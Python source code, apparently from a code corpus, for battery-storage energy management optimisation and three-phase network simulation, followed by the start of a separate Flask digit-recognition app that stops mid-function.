prob.add_constraint(P_ES_ch[t, i] >= 0)
prob.add_constraint(P_ES_dis[t, i] >= 0)
# import/export constraints
for t in range(T_mpc):
# net import variables
prob.add_constraint((sum(P_ES[t, :]) + P_demand[t])\
== (P_import[t] - P_export[t]))
# maximum import constraint
prob.add_constraint(P_import[t] <= self.market.Pmax[t0+t])
# maximum import constraint
prob.add_constraint(P_import[t] >= 0)
# maximum import constraint
prob.add_constraint(P_export[t] <= -self.market.Pmin[t0+t])
# maximum import constraint
prob.add_constraint(P_export[t] >= 0)
#maximum demand dummy variable constraint
prob.add_constraint((P_max_demand + P_max_demand_pre_t0)\
>= (P_import[t] - P_export[t]) )
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand >= 0)
if self.market.FR_window is not None:
FR_window = self.market.FR_window
FR_SoC_max = self.market.FR_SOC_max
FR_SoC_min = self.market.FR_SOC_min
for t in range(t0,self.T_ems):
if FR_window[t] ==1:
for i in range(N_ES):
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* (P_ES_ch[:, i]
- P_ES_dis[:, i]))\
<= (FR_SoC_max
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt])
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
>= (FR_SoC_min
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt])
# minimum terminal energy dummy variable constraint
prob.add_constraint(E_T_min >= 0)
#######################################
### STEP 3: set up objective
#######################################
prices_import = pic.new_param('prices_import',
self.market.prices_import)
prices_export = pic.new_param('prices_export',
self.market.prices_export)
terminal_const = 1e12 # coeff for objective terminal soft constraint
prob.set_objective('min', (self.market.demand_charge * P_max_demand +\
sum(sum(self.dt_ems
* self.storage_assets[i].c_deg_lin
* (P_ES_ch[t, i] + P_ES_dis[t,i])\
for i in range(N_ES))
+ self.dt_ems
* prices_import[t0 + t]
* P_import[t]
- self.dt_ems
* prices_export[t0 + t]
* P_export[t]\
for t in range(T_mpc))
+ terminal_const * E_T_min))
#######################################
### STEP 3: solve the optimisation
#######################################
print('*** SOLVING THE OPTIMISATION PROBLEM ***')
prob.solve(verbose = 0)
print('*** OPTIMISATION COMPLETE ***')
P_ES_val = np.array(P_ES.value)
P_import_val = np.array(P_import.value)
P_export_val = np.array(P_export.value)
P_demand_val = np.array(P_demand)
E_T_min_val = np.array(E_T_min.value)
return {'P_ES_val':P_ES_val,\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val,\
'E_T_min_val':E_T_min_val}
def EMS_copper_plate_t0_c1deg(self, t0):
"""
setup and run a basic energy optimisation (single copper plate network
model) for MPC interval t0
"""
#######################################
### STEP 0: setup variables
#######################################
t0_dt = int(t0 * self.dt_ems / self.dt)
T_mpc = self.T_ems - t0
T_range = np.arange(t0,self.T_ems)
prob = pic.Problem()
N_ES = len(self.storage_assets)
N_nondispatch = len(self.nondispatch_assets)
P_demand_actual = np.zeros(self.T)
P_demand_pred = np.zeros(self.T)
P_demand = np.zeros(T_mpc)
for i in range(N_nondispatch):
P_demand_actual += self.nondispatch_assets[i].Pnet
P_demand_pred += self.nondispatch_assets[i].Pnet_pred
# Assemble P_demand out of P actual and P predicted and convert to
# EMS time series scale
for t_ems in T_range:
t_indexes = (t_ems
* self.dt_ems
/ self.dt
+ np.arange(0, self.dt_ems / self.dt)).astype(int)
if t_ems == t0:
P_demand[t_ems-t0] = np.mean(P_demand_actual[t_indexes])
else:
P_demand[t_ems-t0] = np.mean(P_demand_pred[t_indexes])
#get total ES system demand (before optimisation)
Pnet_ES_sum = np.zeros(self.T)
for i in range(N_ES):
Pnet_ES_sum += self.storage_assets[i].Pnet
#get the maximum (historical) demand before t0
if t0 > 0:
P_max_demand_pre_t0 = (np.max(P_demand_actual[0:t0_dt]
+ Pnet_ES_sum[0: t0_dt]))
else:
P_max_demand_pre_t0 = 0
#######################################
### STEP 1: set up decision variables
#######################################
# energy storage system input powers
P_ES = prob.add_variable('P_ES', (T_mpc,N_ES), vtype='continuous')
# energy storage system input powers
P_ES_ch = prob.add_variable('P_ES_ch', (T_mpc,N_ES),
vtype='continuous')
# energy storage system output powers
P_ES_dis = prob.add_variable('P_ES_dis', (T_mpc,N_ES),
vtype='continuous')
# (positive) net power imports
P_import = prob.add_variable('P_import', (T_mpc,1), vtype='continuous')
# (positive) net power exports
P_export = prob.add_variable('P_export', (T_mpc,1), vtype='continuous')
# (positive) maximum demand dummy variable
P_max_demand = prob.add_variable('P_max_demand', 1, vtype='continuous')
# (positive) minimum terminal energy dummy variable
E_T_min = prob.add_variable('E_T_min', 1, vtype='continuous')
#######################################
### STEP 2: set up constraints
#######################################
# lower triangle matrix summing powers
Asum = pic.new_param('Asum', np.tril(np.ones([T_mpc,T_mpc])))
# Asum = cvxopt.matrix(np.tril(np.ones([T_mpc,T_mpc])), (T_mpc,T_mpc),
# 'd')
# linear battery model constraints
for i in range(N_ES):
# maximum power constraint
prob.add_constraint((P_ES_ch[:, i] - P_ES_dis[:, i])\
<= self.storage_assets[i].Pmax[T_range])
# minimum power constraint
prob.add_constraint((P_ES_ch[:, i] - P_ES_dis[:, i])\
>= self.storage_assets[i].Pmin[T_range])
# maximum energy constraint
prob.add_constraint((self.dt_ems
* Asum
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
<= (self.storage_assets[i].Emax[T_range]
- self.storage_assets[i].E[t0_dt]))
# minimum energy constraint
prob.add_constraint((self.dt_ems
* Asum
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
>= (self.storage_assets[i].Emin[T_range]
- self.storage_assets[i].E[t0_dt]))
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[T_mpc-1, :]
* (P_ES_ch[:, i] - P_ES_dis[:,i])
+ E_T_min)\
>= (self.storage_assets[i].ET
- self.storage_assets[i].E[t0_dt]))
eff_opt = self.storage_assets[i].eff_opt
#P_ES_ch & P_ES_dis dummy variables
for t in range(T_mpc):
prob.add_constraint(P_ES[t, i] == (P_ES_ch[t, i]
/ eff_opt
- P_ES_dis[t, i]
* eff_opt))
prob.add_constraint(P_ES_ch[t, i] >= 0)
prob.add_constraint(P_ES_dis[t, i] >= 0)
#import/export constraints
for t in range(T_mpc):
# net import variables
prob.add_constraint(sum(P_ES[t, :]) + P_demand[t]\
== P_import[t] - P_export[t])
# maximum import constraint
prob.add_constraint(P_import[t] <= self.market.Pmax[t0+t])
# maximum import constraint
prob.add_constraint(P_import[t] >= 0)
# maximum import constraint
prob.add_constraint(P_export[t] <= -self.market.Pmin[t0 + t])
# maximum import constraint
prob.add_constraint(P_export[t] >= 0)
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand + P_max_demand_pre_t0\
>= P_import[t] - P_export[t])
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand >= 0)
# minimum terminal energy dummy variable constraint
prob.add_constraint(E_T_min[:] >= 0)
#if FFR energy constraints
if self.market.FR_window is not None:
FR_window = self.market.FR_window
FR_SoC_max = self.market.FR_SOC_max
FR_SoC_min = self.market.FR_SOC_min
for t in range(len(T_mpc)):
if FR_window[t] == 1:
for i in range(N_ES):
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* P_ES[:, i])\
<= ((FR_SoC_max
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt]))
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* P_ES[:, i])\
>= ((FR_SoC_min
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt]))
#######################################
### STEP 3: set up objective
#######################################
prices_import = pic.new_param('prices_import',
self.market.prices_import)
prices_export = pic.new_param('prices_export',
self.market.prices_export)
terminal_const = 1e12 #coeff for objective terminal soft constraint
prob.set_objective('min', (self.market.demand_charge
* P_max_demand
+ sum(sum(self.dt_ems
* self.storage_assets[i].c_deg_lin
* (P_ES_ch[t,i] + P_ES_dis[t,i])\
for i in range(N_ES))
+ self.dt_ems
* prices_import[t0 + t]
* P_import[t]
+ -self.dt_ems
* prices_export[t0 + t]
* P_export[t]\
for t in range(T_mpc))
+ terminal_const
* E_T_min))
#######################################
### STEP 3: solve the optimisation
#######################################
print('*** SOLVING THE OPTIMISATION PROBLEM ***')
#prob.solve(verbose = 0,solver='cvxopt')
prob.solve(verbose = 0)
print('*** OPTIMISATION COMPLETE ***')
P_ES_val = np.array(P_ES.value)
P_import_val = np.array(P_import.value)
P_export_val = np.array(P_export.value)
P_demand_val = np.array(P_demand)
return {'opt_prob':prob,\
'P_ES_val':P_ES_val,\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val}
# NEEDED FOR OXEMF EV CASE
def EMS_3ph_linear_t0(self, t0, i_unconstrained_lines=[],
v_unconstrained_buses = []):
"""
Energy management system optimization assuming 3 phase linear network
model for Model Predictive Control interval t0
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
t0 : int
Interval in Model Predictive Control. If open loop, t0 = 0
i_unconstrained_lines : list
List of network lines which have unconstrained current
v_unconstrained_buses : list
List of buses at which the voltage is not constrained
Returns
-------
Output : dictionary
The following numpy.ndarrays are present depending upon asset mix:
P_ES_val : Charge/discharge power for storage assets (kW)
P_import_val : Power imported from central grid (kW)
P_export_val : Power exported to central grid (kW)
P_demand_val : System power demand at energy management time
resolution (kW)
PF_networks_lin : Network 3ph list of objects, one for each
optimisation interval, storing the linear power
flow model used to formulate netowrk
constraints
"""
#######################################
### STEP 0: setup variables
#######################################
prob = pic.Problem()
t0_dt = int(t0*self.dt_ems/self.dt)
T_mpc = self.T_ems-t0
T_range = np.arange(t0,self.T_ems)
N_buses = self.network.N_buses
N_phases = self.network.N_phases
N_ES = len(self.storage_assets)
N_nondispatch = len(self.nondispatch_assets)
P_demand_actual = np.zeros([self.T,N_nondispatch])
P_demand_pred = np.zeros([self.T,N_nondispatch])
P_demand = np.zeros([T_mpc,N_nondispatch])
Q_demand_actual = np.zeros([self.T,N_nondispatch])
Q_demand_pred = np.zeros([self.T,N_nondispatch])
Q_demand = np.zeros([T_mpc,N_nondispatch])
for i in range(N_nondispatch):
P_demand_actual[:,i] = self.nondispatch_assets[i].Pnet
P_demand_pred[:,i] = self.nondispatch_assets[i].Pnet_pred
Q_demand_actual[:,i] = self.nondispatch_assets[i].Qnet
Q_demand_pred[:,i] = self.nondispatch_assets[i].Qnet_pred
#Assemble P_demand out of P actual and P predicted and convert to EMS
#time series scale
for i in range(N_nondispatch):
for t_ems in T_range:
t_indexes = (t_ems*self.dt_ems/self.dt +
np.arange(0,self.dt_ems/self.dt)).astype(int)
if t_ems == t0:
P_demand[t_ems-t0,i] =\
np.mean(P_demand_actual[t_indexes,i])
Q_demand[t_ems-t0,i] = \
np.mean(Q_demand_actual[t_indexes,i])
else:
P_demand[t_ems-t0,i] = np.mean(P_demand_pred[t_indexes,i])
Q_demand[t_ems-t0,i] = np.mean(Q_demand_pred[t_indexes,i])
#get total ES system demand (before optimisation)
Pnet_ES_sum = np.zeros(self.T)
for i in range(N_ES):
Pnet_ES_sum += self.storage_assets[i].Pnet
#get the maximum (historical) demand before t0
if t0 == 0:
P_max_demand_pre_t0 = 0
else:
if N_nondispatch == 0: P_max_demand_pre_t0 = Pnet_ES_sum[0:t0_dt]
else:
P_demand_act_sum = sum(P_demand_actual[0:t0_dt,i] \
for i in range(N_nondispatch))
P_max_demand_pre_t0 = np.max(P_demand_act_sum +
Pnet_ES_sum[0:t0_dt])
#Set up Matrix linking nondispatchable assets to their bus and phase
G_wye_nondispatch = np.zeros([3*(N_buses-1),N_nondispatch])
G_del_nondispatch = np.zeros([3*(N_buses-1),N_nondispatch])
for i in range(N_nondispatch):
asset_N_phases = self.nondispatch_assets[i].phases.size
bus_id = self.nondispatch_assets[i].bus_id
# check if Wye connected
wye_flag = self.network.bus_df[self.\
network.bus_df['number']==\
bus_id]['connect'].values[0]=='Y'
for ph in np.nditer(self.nondispatch_assets[i].phases):
bus_ph_index = 3*(bus_id-1) + ph
if wye_flag is True:
G_wye_nondispatch[bus_ph_index,i] = 1/asset_N_phases
else:
G_del_nondispatch[bus_ph_index,i] = 1/asset_N_phases
#Set up Matrix linking energy storage assets to their bus and phase
G_wye_ES = np.zeros([3*(N_buses-1),N_ES])
G_del_ES = np.zeros([3*(N_buses-1),N_ES])
for i in range(N_ES):
asset_N_phases = self.storage_assets[i].phases.size
bus_id = self.storage_assets[i].bus_id
# check if Wye connected
wye_flag = self.network.bus_df[self.\
network.bus_df['number']==\
bus_id]['connect'].values[0]=='Y'
for ph in np.nditer(self.storage_assets[i].phases):
bus_ph_index = 3*(bus_id-1) + ph
if wye_flag is True:
G_wye_ES[bus_ph_index,i] = 1/asset_N_phases
else:
G_del_ES[bus_ph_index,i] = 1/asset_N_phases
G_wye_nondispatch_PQ = np.concatenate((G_wye_nondispatch,
G_wye_nondispatch),axis=0)
G_del_nondispatch_PQ = np.concatenate((G_del_nondispatch,
G_del_nondispatch),axis=0)
G_wye_ES_PQ = np.concatenate((G_wye_ES,G_wye_ES),axis=0)
G_del_ES_PQ = np.concatenate((G_del_ES,G_del_ES),axis=0)
#######################################
### STEP 1: set up decision variables
#######################################
# energy storage system input powers
P_ES = prob.add_variable('P_ES',
(T_mpc,N_ES), vtype='continuous')
# energy storage system input powers
P_ES_ch = prob.add_variable('P_ES_ch',
(T_mpc,N_ES), vtype='continuous')
# energy storage system output powers
P_ES_dis = prob.add_variable('P_ES_dis',
(T_mpc,N_ES), vtype='continuous')
# (positive) net power imports
P_import = prob.add_variable('P_import',
(T_mpc,1), vtype='continuous')
# (positive) net power exports
P_export = prob.add_variable('P_export',
(T_mpc,1), vtype='continuous')
# (positive) maximum demand dummy variable
P_max_demand = prob.add_variable('P_max_demand',
1, vtype='continuous')
# (positive) minimum terminal energy dummy variable
E_T_min = prob.add_variable('E_T_min',
N_ES, vtype='continuous')
#######################################
### STEP 2: set up linear power flow models
#######################################
PF_networks_lin = []
P_lin_buses = np.zeros([T_mpc,N_buses,N_phases])
Q_lin_buses = np.zeros([T_mpc,N_buses,N_phases])
for t in range(T_mpc):
#Setup linear power flow model:
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
phases_i = self.nondispatch_assets[i].phases
for ph_i in np.nditer(phases_i):
bus_ph_index = 3*(bus_id-1) + ph_i
P_lin_buses[t,bus_id,ph_i] +=\
(G_wye_nondispatch[bus_ph_index,i]+\
G_del_nondispatch[bus_ph_index,i])*P_demand[t,i]
Q_lin_buses[t,bus_id,ph_i] +=\
(G_wye_nondispatch[bus_ph_index,i]+\
G_del_nondispatch[bus_ph_index,i])*Q_demand[t,i]
#set up a copy of the network for MPC interval t
network_t = copy.deepcopy(self.network)
network_t.clear_loads()
for bus_id in range(N_buses):
for ph_i in range(N_phases):
Pph_t = P_lin_buses[t,bus_id,ph_i]
Qph_t = Q_lin_buses[t,bus_id,ph_i]
#add P,Q loads to the network copy
network_t.set_load(bus_id,ph_i,Pph_t,Qph_t)
network_t.zbus_pf()
v_lin0 = network_t.v_net_res
S_wye_lin0 = network_t.S_PQloads_wye_res
S_del_lin0 = network_t.S_PQloads_del_res
network_t.linear_model_setup(v_lin0,S_wye_lin0,S_del_lin0)
# note that phases need to be 120degrees out for good results
network_t.linear_pf()
PF_networks_lin.append(network_t)
#######################################
### STEP 3: set up constraints
#######################################
# lower triangle matrix summing powers
Asum = pic.new_param('Asum',np.tril(np.ones([T_mpc,T_mpc])))
# energy storage asset constraints
for i in range(N_ES):
# maximum power constraint
prob.add_constraint(P_ES[:,i] <=
self.storage_assets[i].Pmax[T_range])
# minimum power constraint
prob.add_constraint(P_ES[:,i] >=
self.storage_assets[i].Pmin[T_range])
# maximum energy constraint
prob.add_constraint(self.dt_ems * Asum * (P_ES_ch[:,i] -
P_ES_dis[:,i]) <=
self.storage_assets[i].Emax[T_range] -
self.storage_assets[i].E[t0_dt])
# minimum energy constraint
prob.add_constraint(self.dt_ems * Asum * (P_ES_ch[:,i] -
P_ES_dis[:,i]) >=
self.storage_assets[i].Emin[T_range] -
self.storage_assets[i].E[t0_dt])
# final energy constraint
prob.add_constraint(self.dt_ems * Asum[T_mpc-1,:] * (P_ES_ch[:,i] -
P_ES_dis[:,i]) + E_T_min[i] >=
self.storage_assets[i].ET -
self.storage_assets[i].E[t0_dt])
eff_opt = self.storage_assets[i].eff_opt
#P_ES_ch & P_ES_dis dummy variables
for t in range(T_mpc):
prob.add_constraint(P_ES[t,i] == P_ES_ch[t,i]/eff_opt -
P_ES_dis[t,i] * eff_opt)
prob.add_constraint(P_ES_ch[t,i] >= 0)
prob.add_constraint(P_ES_dis[t,i] >= 0)
#import/export constraints
for t in range(T_mpc):
# maximum import constraint
prob.add_constraint(P_import[t] <= self.market.Pmax[t0 + t])
# maximum import constraint
prob.add_constraint(P_import[t] >= 0)
# maximum import constraint
prob.add_constraint(P_export[t] <= -self.market.Pmin[t0 + t])
# maximum import constraint
prob.add_constraint(P_export[t] >= 0)
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand + P_max_demand_pre_t0 >=
P_import[t]-P_export[t])
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand >= 0)
# Network constraints
for t in range(T_mpc):
network_t = PF_networks_lin[t]
# Note that linear power flow matricies are in units of W (not kW)
PQ0_wye = np.concatenate((np.real(network_t.S_PQloads_wye_res),\
np.imag(network_t.S_PQloads_wye_res)))\
*1e3
PQ0_del = np.concatenate((np.real(network_t.S_PQloads_del_res),\
np.imag(network_t.S_PQloads_del_res)))\
*1e3
A_Pslack = (np.matmul\
(np.real(np.matmul\
(network_t.vs.T,\
np.matmul(np.conj(network_t.Ysn),\
np.conj(network_t.M_wye)))),\
G_wye_ES_PQ)\
+ np.matmul\
(np.real(np.matmul\
(network_t.vs.T,\
np.matmul(np.conj(network_t.Ysn),\
np.conj(network_t.M_del)))),\
G_del_ES_PQ))
b_Pslack = np.real(np.matmul\
(network_t.vs.T,\
np.matmul(np.conj\
(network_t.Ysn),\
np.matmul(np.conj\
(network_t.M_wye),\
PQ0_wye))))\
+np.real(np.matmul\
(network_t.vs.T,\
np.matmul(np.conj\
(network_t.Ysn),\
np.matmul(np.conj\
(network_t.M_del),
PQ0_del))))\
+np.real(np.matmul\
(network_t.vs.T,\
(np.matmul(np.conj\
(network_t.Yss),\
np.conj(network_t.vs))\
+ np.matmul(np.conj\
(network_t.Ysn),\
np.conj(network_t.M0)))))
# net import variables
prob.add_constraint(P_import[t]-P_export[t] ==\
(np.sum(A_Pslack[i]*P_ES[t,i]\
*1e3 for i in range(N_ES))\
+ b_Pslack)/1e3)
# Voltage magnitude constraints
A_vlim = np.matmul(network_t.K_wye,G_wye_ES_PQ)\
+ np.matmul(network_t.K_del,G_del_ES_PQ)
b_vlim = network_t.v_lin_abs_res
#get max/min bus voltages, removing slack and reshaping in a column
v_abs_max_vec = network_t.v_abs_max[1:,:].reshape(-1,1)
v_abs_min_vec = network_t.v_abs_min[1:,:].reshape(-1,1)
for bus_ph_index in range(0,N_phases*(N_buses-1)):
if int(bus_ph_index/3) not in (np.array\
(v_unconstrained_buses)-1):
prob.add_constraint(sum(A_vlim[bus_ph_index,i]\
*(P_ES[t,i])\
*1e3 for i in range(N_ES))\
+ b_vlim[bus_ph_index] <=\
v_abs_max_vec[bus_ph_index])
prob.add_constraint(sum(A_vlim[bus_ph_index,i]\
*(P_ES[t,i])\
*1e3 for i in range(N_ES))\
+ b_vlim[bus_ph_index] >=\
v_abs_min_vec[bus_ph_index])
# Line current magnitude constraints:
for line_ij in range(network_t.N_lines):
if line_ij not in i_unconstrained_lines:
iabs_max_line_ij = network_t.i_abs_max[line_ij,:] #3 phases
# maximum current magnitude constraint
A_line = np.matmul(network_t.Jabs_dPQwye_list[line_ij],\
G_wye_ES_PQ)\
+ np.matmul(network_t.\
Jabs_dPQdel_list[line_ij],\
G_del_ES_PQ)
for ph in range(N_phases):
prob.add_constraint(sum(A_line[ph,i]\
* P_ES[t,i]\
* 1e3 for i in range(N_ES))\
+ network_t.\
Jabs_I0_list[line_ij][ph] <=\
iabs_max_line_ij[ph])
#if FFR energy constraints
if self.market.FR_window is not None:
FR_window = self.market.FR_window
FR_SoC_max = self.market.FR_SOC_max
FR_SoC_min = self.market.FR_SOC_min
for t in range(len(T_mpc)):
if FR_window[t] ==1:
for i in range(N_ES):
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* P_ES[:,i])\
<= ((FR_SoC_max
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt]))
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[t,:]
* P_ES[:,i])\
>= ((FR_SoC_min
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt]))
#######################################
### STEP 4: set up objective
#######################################
# minimum terminal energy dummy variable constraint
prob.add_constraint(E_T_min[i] >= 0)
#coeff for objective terminal soft constraint
terminal_const = 1e12
prices_import = pic.new_param('prices_import',
self.market.prices_import)
prices_export = pic.new_param('prices_export',
self.market.prices_export)
prob.set_objective('min', self.market.demand_charge*\
(P_max_demand+P_max_demand_pre_t0) +
sum(sum(self.dt_ems*self.storage_assets[i].\
c_deg_lin*(P_ES_ch[t,i]+
P_ES_dis[t,i])\
for i in range(N_ES))\
+ self.dt_ems*prices_import[t0+t]*P_import[t]\
- self.dt_ems*prices_export[t0+t]*P_export[t]
for t in range(T_mpc))\
+ sum(terminal_const*E_T_min[i]\
for i in range(N_ES)))
#######################################
### STEP 5: solve the optimisation
#######################################
print('*** SOLVING THE OPTIMISATION PROBLEM ***')
prob.solve(verbose = 0)
print('*** OPTIMISATION COMPLETE ***')
P_ES_val = np.array(P_ES.value)
P_import_val = np.array(P_import.value)
P_export_val = np.array(P_export.value)
P_demand_val = np.array(P_demand)
return {'P_ES_val':P_ES_val,
'P_import_val':P_import_val,
'P_export_val':P_export_val,
'P_demand_val':P_demand_val,
'PF_networks_lin':PF_networks_lin}
# NEEDED FOR OXEMF EV CASE
def simulate_network_mpc_3phPF(self, ems_type = '3ph',
i_unconstrained_lines=[],
v_unconstrained_buses = []):
"""
Run the Energy Management System using Model Predictive Control (MPC)
and simulate an IEEE 13 bus network either copper plate or 3ph
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
ems_type : string
Identifies whether the system is copper plate or 3ph. Default 3ph
i_unconstrained_lines : list
List of network lines which have unconstrained current
v_unconstrained_buses : list
List of buses at which the voltage is not constrained
Returns
-------
Output : dictionary
PF_network_res : Network power flow results stored as a list of
objects
P_ES_ems : Charge/discharge power for storage assets at energy
management time resolution (kW)
P_import_ems :Power imported from central grid at energy
management time resolution (kW)
P_export_ems :Power exported to central grid at energy
management time resolution(kW)
P_demand_ems :System power demand at energy management time
resolution (kW)
"""
#######################################
### STEP 0: setup variables
#######################################
N_ESs = len(self.storage_assets) #number of EVs
N_nondispatch = len(self.nondispatch_assets) #number of EVs
P_import_ems = np.zeros(self.T_ems)
P_export_ems = np.zeros(self.T_ems)
P_ES_ems = np.zeros([self.T_ems,N_ESs])
if ems_type == 'copper_plate':
P_demand_ems = np.zeros(self.T_ems)
else:
P_demand_ems = np.zeros([self.T_ems,N_nondispatch])
N_buses = self.network.N_buses
N_phases = self.network.N_phases
P_demand_buses = np.zeros([self.T,N_buses,N_phases])
Q_demand_buses = np.zeros([self.T,N_buses,N_phases])
PF_network_res = []
#######################################
### STEP 1: MPC Loop
#######################################
print('*** MPC SIMULATION START ***')
for t_mpc in range(self.T_ems):
print('************************')
print('MPC Interval '+ str(t_mpc)+ ' of '+ str(self.T_ems))
print('************************')
#######################################
### STEP 1.1: Optimisation
#######################################
if ems_type == 'copper_plate':
output_ems = self.EMS_copper_plate_t0_c1deg(t_mpc)
P_demand_ems[t_mpc] = output_ems['P_demand_val'][0]
else:
output_ems = self.EMS_3ph_linear_t0(t_mpc,
i_unconstrained_lines,
v_unconstrained_buses)
P_demand_ems[t_mpc,:] = output_ems['P_demand_val'][0,:]
P_import_ems[t_mpc] = output_ems['P_import_val'][0]
P_export_ems[t_mpc] = output_ems['P_export_val'][0]
P_ES_ems[t_mpc,:] = output_ems['P_ES_val'][0,:]
# convert P_EV signals to system time-series scale
T_interval = int(self.dt_ems/self.dt)
P_ESs = np.zeros([T_interval,N_ESs])
for t in range(T_interval):
P_ESs[t,:] = P_ES_ems[t_mpc,:]
#######################################
### STEP 1.2: update the controllable assets
#######################################
t0 = int(t_mpc*(self.dt_ems/self.dt))
# get the simulation time intervals within each EMS time interval
# and implement the ES system control for them
t_range = np.arange(t0,t0+T_interval)
for i in range(N_ESs):
for t_index in range(T_interval):
t = t_range[t_index]
self.storage_assets[i].update_control_t(P_ESs[t_index,i],t)
#######################################
### STEP 1.3: simulate the network
#######################################
# total real and reactive power demand at each bus phase
for t_index in range(T_interval):
t = t_range[t_index]
for i in range(N_ESs):
bus_id = self.storage_assets[i].bus_id
phases_i = self.storage_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in phases_i:
P_demand_buses[t,bus_id,ph_i] +=\
self.storage_assets[i].Pnet[t]/N_phases_i
Q_demand_buses[t,bus_id,ph_i] +=\
self.storage_assets[i].Qnet[t]/N_phases_i
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
phases_i = self.nondispatch_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[t,bus_id,ph_i] +=\
self.nondispatch_assets[i].Pnet[t]/N_phases_i
Q_demand_buses[t,bus_id,ph_i] +=\
self.nondispatch_assets[i].Qnet[t]/N_phases_i
# set up a copy of the network for simulation interval t
network_t = copy.deepcopy(self.network)
network_t.clear_loads()
for bus_id in range(N_buses):
for ph_i in range(N_phases):
Pph_t = P_demand_buses[t,bus_id,ph_i]
Qph_t = Q_demand_buses[t,bus_id,ph_i]
#add P,Q loads to the network copy
network_t.set_load(bus_id,ph_i,Pph_t,Qph_t)
# run the power flow simulation
network_t.zbus_pf()
# store power flow results as a list of network objects
PF_network_res.append(network_t)
print('*** MPC SIMULATION COMPLETE ***')
return {'PF_network_res' :PF_network_res,\
'P_ES_ems':P_ES_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
def simulate_network_3phPF_lean(self, ems_type = '3ph'):
"""
run the EMS in open loop and simulate a 3-phase AC network
"""
#######################################
### STEP 1: solve the optimisation
#######################################
t0 = 0
if ems_type == 'copper_plate':
# self.EMS_copper_plate()
output_ems = self.EMS_copper_plate_t0_c1deg(t0)
else:
# self.EMS_copper_plate()
output_ems = self.EMS_3ph_linear_t0(t0)
#output_ems = self.EMS_copper_plate
P_import_ems = output_ems['P_import_val']
P_export_ems = output_ems['P_export_val']
P_ES_ems = output_ems['P_ES_val']
P_demand_ems = output_ems['P_demand_val']
#convert P_EV signals to system time-series scale
N_ESs = len(self.storage_assets) #number of EVs
N_nondispatch = len(self.nondispatch_assets) #number of EVs
P_ESs = np.zeros([self.T,N_ESs])
for t in range(self.T):
t_ems = int(t/(self.dt_ems/self.dt))
P_ESs[t,:] = P_ES_ems[t_ems,:]
#######################################
### STEP 2: update the controllable assets
#######################################
for i in range(N_ESs):
self.storage_assets[i].update_control(P_ESs[:,i])
#######################################
### STEP 3: simulate the network
#######################################
N_buses = self.network.N_buses
N_phases = self.network.N_phases
P_demand_buses = np.zeros([self.T,N_buses,N_phases])
Q_demand_buses = np.zeros([self.T,N_buses,N_phases])
#calculate the total real and reactive power demand at each bus phase
for i in range(N_ESs):
bus_id = self.storage_assets[i].bus_id
phases_i = self.storage_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[:,bus_id,ph_i] += (self.storage_assets[i].Pnet
/ N_phases_i)
Q_demand_buses[:,bus_id,ph_i] += (self.storage_assets[i].Qnet
/ N_phases_i)
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
phases_i = self.nondispatch_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[:, bus_id, ph_i]\
+= (self.nondispatch_assets[i].Pnet / N_phases_i)
Q_demand_buses[:, bus_id, ph_i]\
+= (self.nondispatch_assets[i].Qnet / N_phases_i)
#Store power flow results as a list of network objects
PF_network_res = []
print('*** SIMULATING THE NETWORK ***')
for t in range(self.T):
#for each time interval:
#set up a copy of the network for simulation interval t
network_t = copy.deepcopy(self.network)
network_t.clear_loads()
for bus_id in range(N_buses):
for ph_i in range(N_phases):
Pph_t = P_demand_buses[t,bus_id,ph_i]
Qph_t = Q_demand_buses[t,bus_id,ph_i]
#add P,Q loads to the network copy
network_t.set_load(bus_id,ph_i,Pph_t,Qph_t)
#run the power flow simulation
network_t.zbus_pf()
if t % 1 == 0:
print('network sim complete for t = '
+ str(t) + ' of ' + str(self.T))
PF_network_res.append(network_t.res_bus_df)
print('*** NETWORK SIMULATION COMPLETE ***')
return {'PF_network_res' :PF_network_res,\
'P_ES_ems':P_ES_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
| StarcoderdataPython |
3312325 | <gh_stars>1-10
import os
from flask import Flask, flash, redirect, render_template, request, session, abort, url_for, make_response, Response
import sys
import yaml
import os.path
import base64
from predict_digit import *
from matplotlib import image as mplimg
import cv2
import numpy as np
#from flask_json import FlaskJSON, JsonError, json_response, as_json
from flask.ext.responses import json_response
app = Flask(__name__)
#FlaskJSON(app)
number=list()
data=list()
def make_number():
global number
stng=''.join([str(i) for i in number])
num=int(stng)
number=list()
return num
def apply_padding(img, border, val):
